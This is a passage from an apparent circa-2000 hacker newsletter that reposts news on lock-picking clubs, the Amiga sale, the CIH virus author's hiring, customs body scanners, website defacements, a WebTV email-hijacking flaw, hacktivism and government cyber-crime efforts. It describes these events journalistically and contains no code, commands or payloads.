Lock-picking to us?: Once again, as at last summer's CCC-sponsored hacker camp outside of Berlin, the lock-picking workshops and competitions were a big hit. Tool kits were on sale, and practical information was abundant on how to use simple tools to make locks melt like butter. Lock-picking sport clubs have popped up all over Germany, spawned by the example of the Hamburg club, a spinoff of the CCC. But Wernery, the club president, said that of its 500 members, only 13 are CCC members. Membership really took off after last summer's camp. "Since the camp, we have a lot of international contacts," he said. "There are clubs now in France, Finland, the Netherlands." Next stop? America, of course. Wernery and his followers are trying to organize a trip to New York City for H2K, an American hacking gathering scheduled for 14-16 July. Last year's German lock-picking champion, Johannes Markmann, tried to capture the allure of what he and the others are spending so much time doing. "The idea is to break taboos," he said. "A taboo is only a taboo if you don't speak out about it. It is art, what we do." Added Wernery: "The only problem is the (lock-making) industry, which is selling such bad stuff." Game fever: There was some internal controversy over just what was being done on the hundreds of computers brought by congress attendees. Seems there's something of a videogame problem. Quake is more like a cult in CCC land. "It's a hack center, not a game center," said one typically outraged participant during the closing discussion session. "If we continue like this, the congress will be just a party under a tent in five years." Media blackout: If there was any consensus among CCC members, it concerned the media: Keeping them away was a good idea. The number of attending journalists has shrunk to about 30, down from 100 one year ago. "We did nothing to encourage journalists to come this year," Riegr said. "We wanted the congress to be more for the CCC family, and to give us a chance to think about what we are doing, and not to share that with the public." @HWA 39.0 Gateway Sells Amiga 01/03/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The old favorite Amiga has been sold once again. This time Gateway, the most recent owner of the Amiga name and technology, has sold it all to a company known as Amino Development Corp. Faithful Amiga users around the world had hoped that Gateway would revive the brand when they acquired it back in 1997. Evidently they will have to wait a little longer. However, since Amino is run by Bill McEwen, the former Amiga, Inc. marketing chief, they hopefully won't have to wait very long. Reuters - via ABC News http://abcnews.go.com/wire/US/reuters19991231_1089.html The UK Register http://www.theregister.co.uk/991231-000006.html Gateway Sells Rights to Amiga Name NEW YORK (Reuters) - Personal computer maker Gateway Inc. (GTW.N) signed a deal to sell its Amiga trademarks and computer systems to closely held Amino Development Corp., the companies said on Friday. Terms of the deal were not disclosed. Gateway senior vice president Peter Ashkin said in a statement the company elected to sell the Amiga name after deciding to wrap Amiga's software engineering function into Gateway's product development systems. San Diego-based Gateway, which acquired the rights to Amiga's technology in 1997, had been planning to revive the brand, prominent in the mid-1980s, for so-called information appliances and PCs. Gateway's shares closed at 70-1/8 on Thursday on the New York Stock Exchange. -=- Posted 31/12/1999 8:23pm by Tony Smith Gateway sells Amiga to ex-Amiga employee Gateway has finally rid itself of the legacy of its acquisition of Amiga with a close-of-year sale of the Amiga hardware spec., system software and brandname to Amino on undisclosed terms. And who do we find runs Amino? Step forward, Bill McEwen, the former Amiga, Inc. marketing chief who quit the company earlier this year just before ex-president Jim Collas was given the boot. McEwen is well respected by the Amiga community, so his acquisition of the Amiga is likely to be received postively -- doubly so since Gateway has long been viewed as the Amiga world's chief bete noire, responsible not only for giving Collas the push but for masterminding the software-only strategy pursued by his successor, Tom Schmidt, a move that for many Amiga users was a tacit admission that Gateway was never really interested in reviving the Amiga brand. In fact, it may well have been interested in doing just that but to use it as the basis for its own Internet appliance line. The snag here is the brand's poor level of recognition outside the community, and the company may have felt that a new brand, one not sullied by years in the IT wilderness, is probably more appropriate. The work on the next-generation software technologies begun under Collas and continued under Schmidt will be folded into Gateway's own Net device product development operation, the company said. Not surprisingly, the deal doesn't include Amiga-related patents awarded since 1997 -- Gateway is hanging on to those. Given Gateway's lack of interest in the 'classic' Amiga, the sale should at least see its continued existence as a computer platform. As yet, Amino hasn't said what its plans for the classic Amiga, but a move into the open source world seems a likely move. The Campaign to Open Source the Amiga (COSA), has been negotiating to open up the classic Amiga OS for some time, so far without success (though Schmidt did seem broadly receptive to the idea). COSA's argument is that the Amiga platform only has a future if it expands its user base, and the best way of doing that is to open it up in the hope of winning the same kind of broad support that Linux has achieved. Certainly, the influx of new talent that such a move would encourage if the Amiga platform isn't to dwindle further and become nothing more than a refuge for die-hards and 80s retro fans. ® @HWA 40.0 CIH Author Hired by Taiwanese Company 01/03/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Yazmon Wahoo International Enterprise Co has announced that it has succeeded in luring Chen Ing-hau away from rivals after the 24-year old completed his military service. Chen has admitted to writing and releasing the deadly CIH virus during his military tour. He was quickly arrested following his confession but was released due to lack of complaints brought against him. Reuters - via Yahoo http://dailynews.yahoo.com/h/nm/19991230/tc/virus_taiwan_1.html Thursday December 30 12:13 AM ET Taiwan Tech Firm Hires Chernobyl Virus Author TAIPEI (Reuters) - A Taiwan technology firm keen to test its own hardware has hired the super-hacker who created the notorious Chernobyl virus -- which laid waste to hundreds of thousands of computers worldwide in April. Wahoo International Enterprise Co said it recently fought off a score of high-tech rivals competing to lure Chen Ing-hau after the 24-year-old completed Taiwan's mandatory military service. A remorseful Chen admitted he wrote the stealthy computer program during his tour of military duty, and was arrested in April but soon released because no complaints were filed in Taiwan. The virus, also known as CIH, wipes out an infected computer's hard drive data every April 26 -- the anniversary of the 1986 Soviet nuclear disaster at Chernobyl, Ukraine. Chen's rogue program hit hardest in countries with weak anti-virus defenses, gumming up hundreds of thousands of computers in South Korea, Turkey and China and thousands in India, Bangladesh, the Mideast and elsewhere. ``Our chairman felt he was a rare computer professional and we decided to accept him with an open heart,'' said Wahoo spokeswoman Vivi Wang. Chen works in Wahoo's hardware testing department, she said. Wahoo, which makes multilingual Linux operating systems, has said it plans to list its U.S. arm, XLinux.com, on the Nasdaq stock market by June 2000. @HWA 41.0 Body-Scanners Used by US Customs 01/03/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The US Customs Service has begun using new high-tech scanners that can see through the clothing of passengers and can search for contraband with an image that shows the naked body. As an alternative to a physical pat-down, frisk or strip search, suspected international smugglers are being offered the body scanner. To insure privacy customs officials have said no image of the naked body is recorded or preserved. (Yet. Wait until 'body matching' can be done as easily as fingerprinting then they will start collecting data to compare new scans against.) Boston Globe http://www.boston.com/dailyglobe2/365/nation/Rights_backers_fight_scanner_that_gets_under_clothes+.shtml Rights backers fight scanner that gets under clothes Customs uses it to seek contraband By Michael Arena Newsday, 12/31/1999 EW YORK - With airports bracing for Y2K problems and possible terrorism, the US Customs Service has begun using new high-tech scanners that can see through passengers' clothing and search for contraband with an image that shows the naked body. International travelers who are suspected of smuggling drugs or carrying weapons are being offered the body scanner as an alternative to a physical pat-down or frisk when they pass through ports of entry at airports across the country. The scanner can display hidden guns, knives, batteries, digital watches, explosive materials and packages of drugs secreted under clothing. Supporters say scanners can help in the fight against terrorism and illegal drug importation. But privacy advocates say the technology's capability to show the full external contours of the body, including male and female private areas, is an ''electronic strip search'' that erodes constitutional protections and is more invasive than a frisk, which is performed while a suspect is fully clothed. Customs Commissioner Raymond Kelly says the body scanners give travelers the choice of avoiding the physical contact of an external body search at the hands of an inspector. ''The option is that we can pat you physically,'' he said, ''or you can step in front of this machine. You don't have to do it.'' To insure privacy, no image is recorded or preserved, he said. And the scanner operator is always the same sex as the person under scan, said Kelly. But Gregory T. Nojeim, legislative counsel for the American Civil Liberities Union, has been fighting the technology since it was first proposed as a security enhancement three years ago after TWA Flight 800 exploded off Long Island. He told an aviation safety conference shortly after the crash that ''the system has a joy-stick driven zoom option that allows the operator to enlarge portions of the image.'' The image is not in photographic detail, but it does provide a clear outline of the person's body. The manufacturer of the BodySearch device said that the concerns are excessive. Robert Peters, vice president of American Science and Engineering of Billerica, said ''You don't get a sharp line image.'' Scanning private areas is necessary because ''that's one of the places where people hide stuff.'' The Customs Service began installing bodyscanners over the last several months as part of Kelly's overhaul of inspectional procedures in response to charges of racial profiling and a congressional hearing that followed. Black women in particular have complained that they were singled out for pat-downs, and a group in Chicago has filed a class-action lawsuit against the agency. The Customs Service was unable to provide numbers for those who have opted for scanning over frisks, and how many of these scans turned up contraband. Scanners were recently installed terminals in New York, Miami, Atlanta, Los Angeles and Chicago at a cost of about $125,000 each. Nojeim said the body scanners are eroding constitutional rights. He cited other dangers. ''It gives passengers a false choice designed to make them feel better about being subjected to an instrusive search conducted without probable cause of a crime. And it runs the risk of making airport search much more common.'' But Peters responded that the scanner is an improvement over the frisk. ''A patdown requires a touching of the private area. A scanner never touches anyone. You are never invading a person's private space,'' he said. This story ran on page A12 of the Boston Globe on 12/31/1999. © Copyright 1999 Globe Newspaper Company. @HWA 42.0 Defacements Continue Unabated in the New Year 01/03/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond For some reason web site defacements continue to make news. While there where dozens of defacements over the last few days those of Lloyd's of London, The UK railways services company Railtrack, and the German Police actually caused a big enough stir to grant some news coverage. None of the defacements caused any permanent damage and all where fixed very quickly. BBC - Railtrack defacement http://news.bbc.co.uk/hi/english/sci/tech/newsid_585000/585227.stm Associated Press - via San Jose Mercury News - Railtrack defacement http://www.mercurycenter.com/svtech/news/breaking/merc/docs/068585.htm Reuters - via Wired - Lloyd's of London defacement http://www.wired.com/news/business/0,1367,33390,00.html Reuters - via Excite - German Police Union defacement http://news.excite.com/news/r/991230/08/odd-hack Attrition.org Defacement Mirror http://www.attrition.org/mirror/attrition/2000-01.html As of this writing Attrition has been down due to hardware problems they lost the main hard disk on their machine, Radius.net is taking over mirroring of defacements while they are down. http://www.radiusnet.net/mirror. Notification of defacements can be sent to hacked@radiusnet.net. BBC: Hackers target UK rail information How the site should appear Hackers broke into and distorted Railtrack's internet home page on Friday as a Y2K prank. The website provides online timetable information for travellers using the UK's railway services. The message from the hackers read: "Sorry, but due to the Y2K compatibility problems there will be no trains operating between 31-12-99 and 02-01-00." The hackers then sent their greetings to "all the Railtrack directors, all the sheep in Wales" and acquaintances with names like HackUK, Rootworm and Slacker. Railtrack quickly corrected the site. A Railtrack spokeswoman said: "This is a prank that is supposed to be amusing. "Unfortunately it will affect hundreds and thousands of people who are trying to get into London for the millennium eve celebrations. "We would like to reassure all our customers that trains are running as published." Railtrack has spent four years checking and correcting its computers. The company, which is responsible for the all the track, signals and some stations in the UK's privatised rail network, was deemed to be 100% compliant under the government's Action 2000 millennium readiness "traffic light" assessment process. it is also operating a command centre through to the end of March to co-ordinate Year 2000-related problems that crop up. -=- Reuters: Posted at 8:14 a.m. PST Friday, December 31, 1999 Hackers break into rail network's Web page LONDON (AP) -- Hackers broke into an official Web site and issued a false warning that train service in Britain had been canceled Friday due to millennium bug problems. The warning, which read ``No trains today,'' was discovered on Railtrack's Internet site at about 9 a.m., officials said. The hoax message also sent greetings to all Railtrack directors and ``all the sheep in Wales.'' Instead of the usual menu, which lets people check train timetables around Britain, the hoax message said no trains would run from New Year's Eve until Jan. 3 because of Y2K computer problems. The rest of the site was still operating, but more difficult to access, officials said. After discovering the hoax, computer experts had it fixed by 11:30 a.m., said Railtrack spokeswoman Lynn Harvey. ``It was annoying rather than a problem,'' Harvey said. ``People were inconvenienced.'' Many Britons rely on the Web site to check timetables to plan their travel arrangements. Particularly with the long holiday weekend, the number of people relying on train service was expected to be high. ``This is a prank which is supposed to be amusing,'' Railtrack, the company that runs Britain's rail lines, said in a statement. ``Unfortunately it will affect hundreds and thousands of people who are trying to get into London for the Millennium Eve celebrations.'' -=- @HWA 43.0 WebTV Hole Causes Spam 01/04/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "I want, I want, I want my WebTV" From HNN http://www.hackernews.com/ contributed by Evil Wench Exploit code currently circulating on the internet allows someone to send email from a WebTV user's box without the user's knowledge and can also be used to compromise the security of users' stored mail. The exploit is being embedded in posts in WebTV's alt.discuss newsgroups, emails, and web pages. It then directs any WebTV box that loads the page to send an email message to an address set in the code. Net4TV http://net4tv.com/voice/story.cfm?StoryID=1823 Wired http://www.wired.com/news/technology/0,1282,33420,00.html WebTV Security Breach: Hijack Code Can Forward Stored Mail Laura Buddine (January 2, 2000) Net4TV Voice has learned that the "hack" code that is being used to send email from a WebTV user's box without the user's knowledge also is being used to compromise the security of users' stored mail. The code, which is being embedded in posts in WebTV's alt.discuss newsgroups, emails and web pages, directs any WebTV box that loads the page to send an email message to an address set in the code. The code executes "in the background;" users who have sent the mail do not see any indication of mail being sent, and only find out about it if they receive a reply or look in their Sent Mail folders. Now, Net4TV Voice has learned that the code has even more serious security implications. It also has been used to forward email from users' own Sent Mail and Saved Mail folders to an address set in the code. Although hackers cannot directly see the email that a WebTV user has within his/her own account, they can forward it out into their own email account on another service, helping themselves to a user's private correspondence and information. Net4TV Voice has been shown how this can be done, and also has heard from one user whose email account has apparently been violated. Code Known At Least Since September The basic email code that is the key to controlling a WebTV user's mailbox has been known by some users since at least September, when it was discussed in one of the WebTV hacking newsgroups. A number of the frequenters of the group used the code to create "receipts" in their mail so that they would receive a mailback when the email was opened and read, or as a watch of their web pages so that they could see who was surfing it. "It was not intended to be used for malicious purposes," wrote one of the WebTV users who made use of the code. "Of course, some with questionable intent got a hold of the code and used it for other than the original purpose." Mods Know About Code, But Customer Service, Abuse Don't Get It Among other things, the code has been used to bombard WebTV's Abuse Department with profane complaints, and to cause users to unknowingly send nasty messages to others. One of the problems is that there is no way within the email itself to prove that the box it came from did not originate the email; one WebTV user has written to Net4TV Voice that WebTV's Compliance Department is threatening her with termination for "spamming," even though the email is being triggered by an email containing the code that is in her box. On December 21, a moderator in the official webtv.users newsgroup posted a warning that users should not go into a hacking newsgroup because of the code. The warning, which was published in Net4TV Voice's mid-issue story, User Alert: WebTV Email 'Hack' Can Send Mail From Your Box, claimed that the code itself was created by "some users." In fact, the code was created by WebTV itself (as were all elements and codes in the WebTV software). Net4TV Voice has since been advised that the code itself was previously posted in webtv.users and was "slipped past the mods." Often, the emails containing the code also contain another "no send" code that prevents them from being forwarded or "bounced." This prevents the trouble-making mail, post, or page from being forwarded to WebTV Abuse as evidence. This has led to some ludicrously frustrating exchanges with WebTV Customer Service in the WebTV Help Center, which insists that they cannot do anything and that posts must be forwarded to Abuse before action can be taken. WebTV user JaxRed offered this example that he had received after he wrote to them explaining the problem and that the posts had "no send" codes preventing them from being forwarded: Dear Customer, Thank you for writing WebTV. We understand your concern regarding this matter. However, this is not an issue that the Customer Service Center, can help you with. We apologize for the misunderstanding on our part regarding this matter. However, this is a matter that you will to forward (sic) on to Abuse@webtv.net. Abuse will look into this matter further for you. Please forward any and all the information that you have regarding this matter to Abuse@webtv.net. Please only forward this matter once, as if this issue is forwarded more than once there is a chance that this issue will be rejecked.(sic) Another user, however, received a different response from the Customer Service Center when she complained about a post made by a self-proclaimed hacker: Dear Customer, Thank you for writing WebTV. We are aware of this issue and are working on removing this person. We do appreciate your feedback. I will pass this information along for you. Waiting for WebTV's Response Net4TV Voice contacted WebTV Networks on Thursday in preparation for this story, but were advised that because of the New Year's holiday, they would be unable to respond until January 3. Although we declined to hold the story to wait for their response, we will post an update to the story when we receive it. However, Net4TV discussed the issue with a former WebTV employee who was involved in the operation of the WebTV servers. These were his comments: WebTV's machines already filter certain content before sending it along to our boxes. They call it transcoding. Essentially what happens is they replace certain HTML with their own, mainly for their own security but also for functionality in some cases. What this means is that WebTV's machines already go through every line of code, whether on a web page or in an e-mail or newsgroup post, looking for the offending HTML and transcoding as necessary before our boxes receive it. That's why I can't understand what's taking them so long to fix this thing. It's probably easier said than done but a quick solution would be to add this mail exploit code to the list of code they're already filtering and be done with it, at least until they can address the problem more thoroughly in a future client build. That'd have to be done eventually because there are certain situations where our boxes by-pass WebTV's machines (and thus the transcoding) but in the meantime the overwhelming majority of the problem would be solved. WebTV's Security History This is not the first time that codes that WebTV created for their own purposes have either been leaked or discovered by users and used to create security holes and "bombs." About eighteen months ago, WebTV's email was actually hacked by a WebTV user, who was then trapped by a "hacking contest" that got him to reveal how he had done it. The hack was reported by the "trapper" to WebTV and that hole was closed. But more holes remained, including some that had many WebTV users playing "Doom" long before it was released (and only to DishPlayer users). Last spring, some WebTV users found another code that could be used to insert and rearrange Favorites folders in other users' boxes, while the use of a WebTV code that could wipe out users' accounts (the Amnesia Bomb) caused such problems that WebTV was forced to rush out a browser update to stop it (Amnesia Bomb Halts Plus Update). The most serious security breach was revealed in September, when Net4TV Voice broke the story WebTV Spam Block Revealing User, Subscriber IDs. WebTV tried to downplay the seriousness of the breach, claiming that nothing could be done with the IDs even if they were revealed (not true -- with a user ID known, it was possible to terminate a user's account remotely); WebTV's Customer Service department even sent email to users in which they claimed that the Net4TV Voice story was "bogus" and that Net4TV was working with spammers to get the maximum amount of spam delivered to WebTV users. When confronted by CNet and ZDNet, however, WebTV admitted the security breach was true but stated that it had been fixed. Microsoft itself has also had its security problems, with breach after breach in HotMail security finally causing the company to announce that it was calling in an independent outside auditor to review its security. Microsoft would not release the name of the auditing company, stating only that it was one of the "big five," but did admit that its biggest breach had been caused by a string of code that hadn't been tested for security. When the flaw was first revealed, Microsoft claimed that its security had been broken by sophisticated hackers, armed with powerful software tools. In October, Microsoft announced that Truste had OK'ed the security fix at HotMail. Security and privacy are two areas of growing concern, as the U.S. continues to use a "voluntary action" and "self-enforcement" approach rather than the stringent protection of the individual's personal data that the European (EC) countries require. The U.S. privacy laws are a patchwork of state and federal laws, rules, and regulations that have numerous loopholes, and as databases link up and make it easier to create detailed profiles on any citizen, there is increasing call for a general privacy policy to replace today's patchwork. WebTV itself has also drawn fire because of its collection of user data; although then-CEO Steve Perlman revealed in October 1998 that WebTV was recording its users' activity on the Net and on TV (see WebTV Is Watching You), it did not offer its users the ability to "opt out" of being recorded until the HipHop upgrade in November, 1999, over one year later. "It's not that I only don't trust WebTV not to sell information they have on me," wrote one user to Net4TV Voice, "I don't trust them not to just let it out accidentally because they didn't lock the door. I'm beginning to wonder if they even care about anyone's secrets except their own. I just traded up to a new WebTV Plus and I used my son's credit card. He's got a different name and a different billing address -- but they never even asked for anything except a card number and an expiration date... it could have been anyone's." -=- Wired; WebTV To Patch Email Hole by John Gartner 3:00 a.m. 4.Jan.2000 PST WebTV is working on a fix for a security hole that enables third parties to send email from WebTV accounts. Malicious programmers have been embedding the HTML of Web pages and newsgroups with stealthy code that can force email accounts into sending messages without the user's knowledge. The security hole was first reported on Net4TV. The code is being used to spam WebTV's abuse mailbox and could be used to send emails to unsuspecting third parties. On Tuesday, a WebTV spokeswoman acknowledged the security problem, and said that the company was working on a software patch that would be posted today. WebTV users can determine if their email account has been compromised by checking their "sent" folder for email and identifying anything that does not look familiar, the WebTV spokeswoman said. WebTV will update their server software to remove the vulnerability; users will not have to download any additional software, according to the company. According to Laura Buddine of Iacta.com, the parent company of Net4TV, the code was first made known to hackers in September, but has become widespread during the last week. "At this point, this code is all over the place," said Buddine. The offending code has been placed on newsgroups that are accessible only to WebTV users, as well as on hacker newsgroups such as alt.discuss.webtv.hacking, according to Buddine. She said the code was originally written by a WebTV employee but has since turned into a tool for ne'er-do-wells. "I could envision someone using it to get others in trouble by sending death threats from other people's accounts," Buddine said. Buddine said that she has received more than 10 emails from WebTV users who claim to have had been affected. WebTV said that the user impact has been minimal with only one user reporting malicious mail being sent. In addition to being able to generate email without the user's knowledge, the code can be engineered to forward email from sent mail or saved mail folders. According to Buddine, a WebTV employee acknowledged the existence of the security hole on 21 December, and posted a warning to WebTV users not to visit the alt.discuss.webtv.hacking newsgroup because it would cause erroneous messages to be sent to the WebTV abuse mailbox. Buddine said that hours after Net4TV posted the story on Monday detailing the hole, WebTV blocked the Net4TV mail servers from sending email to WebTV users. WebTV posted the Net4TV IP address on the list of spammers. Buddine said email emanating from the Net4TV IP address was denied as of 4 p.m. PST Monday. She said Net4TV's attorney sent an email to WebTV early Tuesday, and their IP address was removed from the list approximately 20 minutes later. In September, Net4TV reported that WebTV email accounts that were full would disclose subscriber and user ID information as part of an automatic reply. WebTV subsequently fixed the problem. @HWA 44.0 Vandalism or Hactivism? 01/04/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evenprime For the most part web defacements over the last year have been nothing but vandalism executed by kids looking for bragging rites amongst their peer group. Hactivists struggled throughout 1999 to find an identity and separate themselves from this activity. MSNBC take a look at these two issues and more in their report. MSNBC http://www.msnbc.com/news/351434.asp?cp1=1 Electronic vandalism runs amok 1999: A year in which the electronic underground came of age The FBI's Web site was among those victimized by (PIC) hackers who defaced government sites this year. By Brock N. Meeks MSNBC WASHINGTON, Dec. 29 — Digital vandalism jumped on and off the national stage this year fueled by hyperbole, spawned largely by fear, uncertainty and doubt. Few of these exploits were of any real note and served largely as an embarrassment to apathetic systems administrators whose computers were easy targets for kids with too much time on their hands and the patience to download any of the numerous “do-it-yourself” break-in tools lingering in murky digital corridors of the Internet. ‘To date, the vast majority of Web site defacements have been a mere collection of invectives, profanities and little else. No real statements of or for any political cause have ever been made, even when the domain that was hit presented an optimal forum for such statements.’ — JAY DYSON systems administrator for NASA's Jet Propulsion Labs THE FEDERAL BUREAU OF INVESTIGATION kept chasing these computer vandals, scaring many, arresting some and prosecuting even fewer. In one of the most infamous moves this year, the FBI executed a multi-state raid on a dozen or more people in the aftermath of several high-visibility government Web site defacements, most notably the official White House Web site, the show pony of the federal government. The FBI eventually tracked down and prosecuted the perpetrator of the White House Web site break-in and in return bought itself a kind of digital holy war. Every kid that fashioned him or herself a “hacker” began defacing Web pages, seemingly at will, leaving enough mangled prose and pretzel logic screeds to drive a high-school English teacher into early retirement. The self-fueling “war” against the FBI eventually led to the Bureau’s own electronic back yard when its official Web site was attacked and was out of commission for a week. Has the FBI beefed up its ability and effectiveness in corralling these electronic joy riders? No, says Brian Martin, a computer security consultant and staff member of Attrition.org, a Web site that acts as an archive for hacked Web sites. The FBI “has just been lucky that some of these defacers are piss-poor hackers,” Martin says. The defacers “leave obvious trails… and brag about their exploits on IRC from their home accounts, basically giving themselves up,” Martin says. HACKER, HEAL THYSELF Those who traffic in the electronic underground often form “organizations” that are loose coalitions of allegiances. Some last for months, some a few days; often, one is member of several different groups at the same time. These digital tribes brand themselves and their exploits so that bragging rights can be more easily tossed around, not unlike the way graffiti artists “tag” their works with a spray-paint can. Stupid and careless acts have usually been addressed between members of the same or competing groups, off the radar screen of the press and public in what amounted to little more than locker room pejoratives being electronically hurled at one another as fast as one could misspell any word with more than two syllables. But this year saw the emergence of public upbraiding for inane acts in what the Hacker News Network called “a turning point in the underground hacking community.” An underground group called the “Legions of the Underground” unilaterally declared a full-scale “cyberwar” on the computing infrastructures of China and Iraq, citing human-rights abuses and the production of weapons of mass destruction as justification. ‘Unless the domain is specifically targeted, defaced with a specific message that is relevant to the domain and current events, it is weak justification at best. Hacking www.mom-and-pops-store.com with a “free Switzerland” message just isn’t logical.’ — BRIAN MARTIN Attrition.org staffer The reaction from within the underground community was a swift and unrelenting condemnation of LoU’s intent. LoU quickly recanted, claiming it never really had destructive intentions and laying the confusion at the feet of the clueless media. But in a joint statement released by several long-standing and well-known hacking groups — including 2600, Chaos Computer Club, Cult of the Dead Cow, L0pht Heavy Industries and others — the LoU action was publicly condemned. In the joint communiqué, groups said they “strongly opposed any attempt to use the power of hacking to threaten or destroy the information infrastructure of any country, for any reason.” FALL OF THE RISE OF HACKTIVISM This year also saw the de-evolution of so-called “hacktivism,” which is political speech wrapped around the act of defacing Web sites. In the beginning, such defacements carried valid political messages placed on cracked Web sites as a valid means of protest. Such political acts were quickly “adopted” by garden-variety computer vandals — “script kiddies,” as they are derisively known in the underground — as a means of trying to validate routine and mindless computer break-ins. In the joint statement condemning the LoU plans, the coalition of hacker groups noted that hacktivism “may be a legitimate use of hacking knowledge,” but that there was a thin line between political activism and “wanton destruction” of computer property. “To date, the vast majority of Web site defacements have been a mere collection of invectives, profanities and little else,” said Jay Dyson, a systems administrator for NASA’s Jet Propulsion Labs who battles daily with computer break-in attempts. “No real statements of or for any political cause have ever been made, even when the domain that was hit presented an optimal forum for such statements,” Dyson said. Most hacktivism, Dyson said, “strikes me as an afterthought, something the intruder does to legitimize the system breach to themselves or their peers.” Ninety-nine percent of alleged acts of hacktivism are “a thinly veiled charade to mask electronic joyriding,” said Attrition.org’s Martin. “Unless the domain is specifically targeted, defaced with a specific message that is relevant to the domain and current events, it is weak justification at best. Hacking www.mom-and-pops-store.com with a ‘free Switzerland’ message just isn’t logical,” Martin said. “Hacking www.oppress-switzerland.org with a valid rant about why it is ethically or morally wrong to do so then falls under ‘hacktivism.’ Everything else is script-kiddy delusion of moral justification.” THE REAL DARK SIDE Finally, this year saw persistent rumors crop up of a mysterious international figure known in the electronic underground as “Virus.” This person reportedly trolls the Net, soliciting hackers to break into government computers looking for intelligence of all types and offering them money if they are successful. Those contacted by Virus say he claims his name is “Khalid Ibrahim.” MSNBC has contacted at least four individuals who say they’ve been contacted by “Virus.” One hacker was asked to break into government sites in India and Pakistan looking for information on missiles capable of carrying nuclear warheads. Hacker News Network: Highlights of 1999 According to sources interviewed by MSNBC, Virus claims to be based in India, and evidence given to MSNBC apparently confirms that he is logging in from an ISP based in that country. Those contacted by Virus and interviewed by MSNBC say he claims not to be a terrorist; his real motivation for collecting the data remains unknown. Messages sent by MSNBC to alleged e-mail accounts owned by Virus and attempts to contact him via Internet chat services, such as ICQ, have not been answered. One hacker contacted by Virus claims to have received $1,200 from him, though MSNBC was not able to confirm the payment. MSNBC has confirmed that the FBI has questioned several hackers the Bureau’s agents have raided about the existence of Virus and whether or not they have done any work for him. To date, the real identity, location and motivation of Virus remains unknown and he is still trolling the Net. @HWA 45.0 No Longer Worried About Y2K Feds Look to Security 01/04/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by mphantasm Since Y2K is over the FBI and other agencies have set their sites on terrorists, hostile nations, criminals, and other cyber evil-doers as they prepare to protect our nations infrastructure. CNN http://www.cnn.com/2000/TECH/computing/01/02/cyberterrorism/ Governments ready to fight cyber-crime in new millennium January 2, 2000 Web posted at: 4:29 a.m. EST (0929 GMT) In this story: 'It's a very serious threat' Countries develop anti-hacker squads RELATED STORIES, SITES From Justice Correspondent Pierre Thomas WASHINGTON (CNN) -- In 1997, a Worcester, Massachusetts, teenager used his computer to knock out communications at an air traffic control tower -- for six hours. In March of 1999, a programmer unleashed the Melissa virus, disabling thousands of computers around the United States. And every day, the Pentagon is the target of as many as 100 hacking attempts. As a new century begins, cyber-crime, including electronic terrorism, looms as a new way for criminals to threaten global security. According to Richard Clark, the coordinator for security, infrastructure, protection and counter-terrorism at the National Security Council, our dependency on computers will make us increasingly vulnerable. "They (computers) run our electric power grid, out telecommunications network, they run our railroads, our banking system, and all of them are vulnerable, at some level, to some degree to information warfare, or cyber-terrorism," Clark said. "There really is a broad spectrum of people, groups and countries that engage in cyber-attacks as a general matter for different purposes, " said Michael Vatis, director of the National Infrastructure Protection Center at the FBI. 'It's a very serious threat' Terrorists, hostile nations, criminals, hackers -- they all present a wide variety of threats and create new pressure for intelligence, defense and law enforcement around the world. The FBI computer crime case load has doubled each of the last two years. In October, the FBI reported 800 pending cases. "According to the National Security Administration, there are over a hundred countries that are working on techniques to penetrate our information infrastructure," said Sen. Jon Kyl, R-Arizona. "Many of them are aimed at the Defense Department and high security areas in both the private sector and the government, so it's a very serious threat." The government is working to prepare for electronic assaults, much the way it prepares for other forms of terrorism. "Our mission is to try to help protect the nation's critical infrastructures," said Vatis. "Somebody sitting with a laptop computer and a modem connection on the other side of the world can attack those things if they don't have good security," said Vatis. Added Clark, "There are governments that are building units, military units and intelligence units, to engage in information warfare. They are developing capabilities, they are building the units, and in some cases they seem to be doing reconnaissance on our computer networks." Countries develop anti-hacker squads Cyber-criminals have a major advantage: They can use computer technology to inflict damage, while simultaneously reducing their risk of getting caught. "Terrorists still prefer car bombs, you know. A car bomb still has a lot impact than a cyber-attack," said Richard Power with the Computer Security Institute. "But there is always the possibility that somebody could make some kind of dramatic statement by bringing down some aspect of the infrastructure." Some nations have developed computer anti-hacking teams to block and investigate crimes in cyberspace. But officials say as technology rapidly advances, preventing cyber-crime and catching cyber-criminals will only become tougher. @HWA 46.0 Interview With Richard Smith 01/04/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Privacy advocate and cyber whistle-blower Richard Smith has given a rather extensive interview to the Boston Globe. Now retired from Cambridge based Phar-Lap Software, a company he headed for 13 years, Smith looks for privacy loopholes online. Boston Globe http://www.globe.com/dailyglobe2/002/city/A_whistle_blower_out_to_save_cyber_privacy+.shtml A whistle-blower out to save cyber privacy By Andreae Downs, Globe Correspondent, 1/2/2000 ROOKLINE - The man who helped bust the writer of the Melissa computer virus, the man who has been behind several cyber headlines about on-line privacy or the lack thereof, lives, actually, a rather private life on a hill in Brookline. Richard Smith, 46, enjoys stripping the glitz off Web pages and finding out what's underneath. What he's found, after about a year of digging, is that more information is being gathered about Web surfers than most people suspect. ''I look at it from a technical standpoint, how it all works,'' Smith said in a recent interview. ''And then I compare it to what the companies say they do.'' Smith has been called a ''living treasure of the Internet'' by those interested in on-line privacy issues. ''Before him, nobody seemed to be watching the e-store,'' said Jason Catlett, president of Junkbusters Corp., an on-line company based in New Jersey that also investigates computer privacy matters. ''Even the knowledge that there's a whistle blower in cyberspace is surely keeping some of the worst schemes of marketers from reaching implementation. Smith retired in September from Phar Lap Software, a firm he founded and led for almost 13 years. Phar Lap, in Cambridge, specializes in software tools for the remote control of embedded computer systems in things like weather stations and automatic teller machines. Smith and his family moved from Needham to Brookline about a decade ago so that his step-daughter, Anna Shusterman, now a science teacher, could attend Brookline High 